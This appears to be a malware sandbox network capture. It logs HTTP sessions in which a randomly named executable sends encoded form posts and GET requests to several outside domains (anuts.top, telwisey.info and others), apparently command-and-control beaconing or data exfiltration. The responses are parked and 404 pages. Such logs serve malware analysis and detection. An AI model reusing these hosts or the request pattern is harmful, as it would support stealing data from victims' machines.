                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                          Jul 4, 2024 16:54:03.888339043 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                          Jul 4, 2024 16:54:03.888351917 CEST448INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                          Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                          Jul 4, 2024 16:54:03.888365030 CEST1236INData Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20
                                          Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                                          Jul 4, 2024 16:54:03.888379097 CEST1236INData Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e
                                          Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                                          Jul 4, 2024 16:54:03.888441086 CEST430INData Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67
                                          Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          16192.168.2.749723194.9.94.85806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:05.761291981 CEST534OUTGET /4hda/?YbCL=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/f3zij1q4lqhkHJ2CNqkydCYpEmp0eXiAcXcwGmcRWkkIq9RVVQfBdjK&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.xn--matfrmn-jxa4m.se
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:54:06.432868004 CEST1236INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:54:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          X-Powered-By: PHP/8.1.24
                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                          Jul 4, 2024 16:54:06.432897091 CEST1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                          Jul 4, 2024 16:54:06.432912111 CEST1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                          Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                          Jul 4, 2024 16:54:06.432948112 CEST1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                          Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                          Jul 4, 2024 16:54:06.432966948 CEST878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                          Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          17192.168.2.74972423.251.54.212806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:12.061387062 CEST775OUTPOST /li0t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.anuts.top
                                          Origin: http://www.anuts.top
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.anuts.top/li0t/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 70 6e 2f 79 52 51 68 59 6a 4a 62 56 56 49 73 68 33 32 4a 64 46 4f 30 53 53 6d 4e 55 33 75 52 57 53 6e 37 78 33 42 46 69 48 55 6a 50 69 38 6c 34 43 4b 6d 75 66 75 43 70 6b 77 63 2b 67 37 6f 2b 46 65 61 43 76 6f 35 65 76 79 6e 69 55 72 38 54 4d 6a 4a 78 75 42 41 46 70 53 35 45 61 45 56 68 35 7a 43 69 47 38 43 70 46 4b 4c 75 77 54 58 69 36 6b 6c 79 32 4a 4a 4e 33 41 73 53 42 37 67 65 73 31 75 74 70 77 31 35 6b 39 55 47 55 73 35 54 35 59 39 6c 33 73 51 6d 66 31 6a 41 30 30 70 46 79 39 5a 35 74 51 70 44 6f 71 4c 4c 6c 73 59 71 5a 30 51 4a 66 6d 6b 45 63 71 42 65 6d 74 32 78 79 69 63 2b 51 41 3d 3d
                                          Data Ascii: YbCL=RXwfOcHa9T4Mpn/yRQhYjJbVVIsh32JdFO0SSmNU3uRWSn7x3BFiHUjPi8l4CKmufuCpkwc+g7o+FeaCvo5evyniUr8TMjJxuBAFpS5EaEVh5zCiG8CpFKLuwTXi6kly2JJN3AsSB7ges1utpw15k9UGUs5T5Y9l3sQmf1jA00pFy9Z5tQpDoqLLlsYqZ0QJfmkEcqBemt2xyic+QA==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          18192.168.2.74972523.251.54.212806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:14.588407993 CEST795OUTPOST /li0t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.anuts.top
                                          Origin: http://www.anuts.top
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.anuts.top/li0t/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 42 57 53 47 4c 78 32 44 74 69 41 55 6a 50 73 63 6b 79 63 36 6d 70 66 75 47 68 6b 31 6b 2b 67 37 38 2b 46 61 57 43 76 37 68 52 75 69 6e 67 4d 62 38 64 49 6a 4a 78 75 42 41 46 70 53 38 5a 61 41 78 68 34 44 53 69 46 59 32 75 62 36 4c 70 6d 6a 58 69 70 30 6c 32 32 4a 4a 2f 33 46 49 30 42 39 6b 65 73 77 4b 74 71 68 31 36 2f 4e 55 4d 4b 63 34 6e 33 4c 49 31 31 4e 34 4a 57 32 50 35 31 6e 63 6e 36 72 45 62 33 79 6c 76 32 37 7a 77 68 75 38 63 4f 53 4e 38 64 6e 67 63 52 49 31 2f 35 61 54 62 2f 77 39 36 47 34 65 5a 53 2b 42 7a 49 6a 72 7a 61 4e 37 31 49 47 57 58 36 71 38 3d
                                          Data Ascii: YbCL=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YBWSGLx2DtiAUjPsckyc6mpfuGhk1k+g78+FaWCv7hRuingMb8dIjJxuBAFpS8ZaAxh4DSiFY2ub6LpmjXip0l22JJ/3FI0B9keswKtqh16/NUMKc4n3LI11N4JW2P51ncn6rEb3ylv27zwhu8cOSN8dngcRI1/5aTb/w96G4eZS+BzIjrzaN71IGWX6q8=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          19192.168.2.74972623.251.54.212806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:17.121809959 CEST1808OUTPOST /li0t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.anuts.top
                                          Origin: http://www.anuts.top
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.anuts.top/li0t/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 52 58 77 66 4f 63 48 61 39 54 34 4d 6f 48 76 79 58 33 39 59 32 5a 62 57 51 49 73 68 38 57 4a 42 46 4f 34 53 53 6e 4a 69 32 59 4a 57 54 30 7a 78 32 6b 5a 69 42 55 6a 50 79 4d 6b 78 63 36 6d 30 66 71 69 6c 6b 31 35 46 67 35 45 2b 45 35 65 43 36 2b 4e 52 67 69 6e 67 51 72 38 51 4d 6a 49 72 75 42 52 43 70 54 4d 5a 61 41 78 68 34 42 61 69 52 38 43 75 5a 36 4c 75 77 54 58 75 36 6b 6c 65 32 4a 52 46 33 46 4d 43 43 4e 45 65 76 51 61 74 6d 33 5a 36 7a 4e 55 4b 4c 63 34 2f 33 4c 56 76 31 4e 6b 46 57 32 4b 63 31 6c 38 6e 35 39 56 54 6a 41 4e 75 72 34 50 65 6e 74 34 63 47 68 70 61 58 55 49 73 58 62 6c 43 38 6f 4c 6e 38 68 4e 4d 4d 73 50 41 4e 64 46 36 48 42 6e 36 66 6f 75 73 53 6a 61 63 70 4b 56 4c 72 6b 39 52 38 49 70 6c 73 38 61 76 76 74 45 49 53 7a 46 68 41 47 41 32 74 6a 6d 49 57 7a 30 74 52 38 78 42 67 70 71 68 67 49 4c 43 78 2b 70 78 57 70 61 63 36 47 42 31 4a 42 78 67 2b 51 30 57 6b 56 6c 78 6b 77 4b 30 77 78 50 63 51 56 77 71 75 45 48 36 42 47 69 76 68 36 51 68 6a 30 77 57 76 58 6f 43 52 [TRUNCATED]
                                          Data Ascii: YbCL=RXwfOcHa9T4MoHvyX39Y2ZbWQIsh8WJBFO4SSnJi2YJWT0zx2kZiBUjPyMkxc6m0fqilk15Fg5E+E5eC6+NRgingQr8QMjIruBRCpTMZaAxh4BaiR8CuZ6LuwTXu6kle2JRF3FMCCNEevQatm3Z6zNUKLc4/3LVv1NkFW2Kc1l8n59VTjANur4Pent4cGhpaXUIsXblC8oLn8hNMMsPANdF6HBn6fousSjacpKVLrk9R8Ipls8avvtEISzFhAGA2tjmIWz0tR8xBgpqhgILCx+pxWpac6GB1JBxg+Q0WkVlxkwK0wxPcQVwquEH6BGivh6Qhj0wWvXoCRXaUrrN7YQXJ/GuPImg55fG3AExOdmINo9DVLDXRcO/2I8HC0HYrv4+fmcOX8piS8sCU0uhpKti2NALdpGLI/iHb2POlDQOBVbTcMPsekXuP9FFdrehRIc1lpSALltcIJmFOfPoOD/a+LUH77hpB28o3PW8LU9ugJXlP08/6rLoY5VdLaZW6i6Fo8d5oamKKGW1tFXk67n85HGto45qFPRWprdCXcOXBLl+foUcMq4RujUj9hVSlEjR3m1abyrcPZC5tzfLsYZA8TZ6UwrFaZC/6zdubcHFlVLPU3hpNC5Uj/RfX23qQYfbY9K/3aSBHxtaaJY/lNZZvUDAU7N10F6HUfW9Z9G5L1XgXoYgAqGwGHzVQuP/++S7K9wQ+mX+gpKarWTKqKx/8oQv+joFGZWcBmyugmg+7BuC4MPe8NDTpWpckRdOH2/RyYJdhBMAsuyKbCYhLqMzPXTUj/oTgBMZyyJJLn98KjwKRLKzXTV65D15UQZQvlprTA62w0pio8u02/5jaS9uU/9znHqhMTJYy5uBcjKEt7mGYcFi4ePfc7HQYrqd5bB/5VW1BBih91JiqhvzRk/rSTrZJs9Y0+QAeQEwRPTGnN3DqHQ7r98GlltdcMeSW8xEFBT+qQTe7qCrFdB9WUdwV3GimsMuBiya/Kl/LYlQ7gDj [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          20192.168.2.74972723.251.54.212806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:19.667346954 CEST523OUTGET /li0t/?fhW=BLvXr6e0EhyxeX&YbCL=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmjHLM7Y8ZEUPvisCvQ4bRBJc30+1Sfiya8KVn3bitTBOxY938FEQPd1w HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.anuts.top
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          21192.168.2.749728199.192.19.19806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:54:46.311846018 CEST787OUTPOST /ei85/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.telwisey.info
                                          Origin: http://www.telwisey.info
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.telwisey.info/ei85/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 4b 4a 50 4e 6e 70 4d 64 5a 63 2b 53 48 41 38 54 45 72 72 46 6e 6d 79 64 61 4d 4e 77 72 6f 4d 4a 30 4b 2f 2f 36 51 55 79 54 33 56 46 59 45 69 4b 63 4a 78 32 43 45 2b 6e 30 63 74 73 37 4c 35 70 61 57 32 77 48 76 52 50 6d 53 70 32 43 67 7a 67 76 42 54 6e 6a 31 38 74 4d 6b 6c 48 59 68 64 31 6f 45 47 4d 50 2b 6c 75 74 47 36 4d 49 38 52 47 68 59 42 53 4f 4b 4c 4b 33 51 37 36 66 73 62 35 4d 43 66 57 6e 56 74 6b 33 59 31 79 78 52 58 6c 39 2b 4a 33 34 64 58 6c 34 45 6b 71 38 70 73 70 39 34 50 39 37 62 64 50 61 75 67 73 47 54 38 2b 6f 69 6a 67 36 32 4d 41 7a 32 33 33 64 32 58 73 2b 58 4c 63 61 67 3d 3d
                                          Data Ascii: YbCL=DTOKciQymv5BKJPNnpMdZc+SHA8TErrFnmydaMNwroMJ0K//6QUyT3VFYEiKcJx2CE+n0cts7L5paW2wHvRPmSp2CgzgvBTnj18tMklHYhd1oEGMP+lutG6MI8RGhYBSOKLK3Q76fsb5MCfWnVtk3Y1yxRXl9+J34dXl4Ekq8psp94P97bdPaugsGT8+oijg62MAz233d2Xs+XLcag==
                                          Jul 4, 2024 16:54:46.924302101 CEST1236INHTTP/1.1 404 Not Found
                                          Date: Thu, 04 Jul 2024 14:54:46 GMT
                                          Server: Apache
                                          Content-Length: 16026
                                          Connection: close
                                          Content-Type: text/html
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                          Jul 4, 2024 16:54:46.924325943 CEST224INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                          Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705
                                          Jul 4, 2024 16:54:46.924335003 CEST1236INData Raw: 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22
                                          Data Ascii: ,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet"> <circle fil
